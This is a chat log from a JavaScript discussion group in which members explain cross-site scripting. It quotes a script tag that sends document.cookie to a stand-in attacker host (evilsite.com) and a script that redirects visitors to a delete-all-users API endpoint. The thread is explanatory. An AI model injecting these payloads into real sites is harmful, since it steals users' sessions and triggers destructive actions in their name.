Message from JavaScript discussions

April 2019

— Not like such

— 

What if someone set it to:
<script>fetch('http://evilsite.com/?secretdata=' + document.cookie)</script>

— Do you see the problem with this?

— What it will do

— Will send the cookies from every user that logs onto the site to the attackers server

— And the attacker will potentially have their login session

— That's scary

— I get an JSON data in which the data are signatured.. I have to extract the data from json object and have to append it as rows dynamically into table

Message permanent page

— What about this:
<script>location.href='/api/delete/user/all'</script>

— Pleas help anybody

— Every user that visits the site will now get redirected to the sites' API

— And potentially execute some operation (while logged in as them)